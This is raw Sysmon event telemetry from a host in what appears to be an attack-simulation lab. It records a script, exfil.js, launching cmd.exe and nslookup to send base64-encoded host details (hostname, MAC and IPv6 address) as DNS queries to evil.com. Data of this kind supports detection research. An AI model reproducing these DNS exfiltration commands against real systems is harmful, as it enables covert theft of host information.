14:16:47.341{2E1864BB-17A1-629A-783D-000000005F02}55521788C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-3C42-000000005F02}1096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.344{2E1864BB-17CF-629A-3C42-000000005F02}1096C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcnpgex.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.326{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlweb.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-17CF-629A-3A42-000000005F02}7952376C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3B42-000000005F02}5752C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3B42-000000005F02}5752C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.295{2E1864BB-17CF-629A-3942-000000005F02}75207976C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-3B42-000000005F02}5752C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.304{2E1864BB-17CF-629A-3B42-000000005F02}5752C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-3942-000000005F02}7520C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlweb.tmp 2>&1 10341000x8000000000000000204803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.279{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3A42-000000005F02}7952C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.263{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3A42-000000005F02}7952C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.263{2E1864BB-17CF-629A-3A42-000000005F02}7952376C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3942-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.258{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3A42-000000005F02}7952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3942-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-17A1-629A-783D-000000005F02}55525044C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-3942-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.247{2E1864BB-17CF-629A-3942-000000005F02}7520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlweb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.242{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrunub.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-17CF-629A-3742-000000005F02}42883872C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3842-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3842-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.195{2E1864BB-17CF-629A-3642-000000005F02}78802812C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-3842-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.201{2E1864BB-17CF-629A-3842-000000005F02}7328C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-3642-000000005F02}7880C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrunub.tmp 2>&1 10341000x8000000000000000204783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 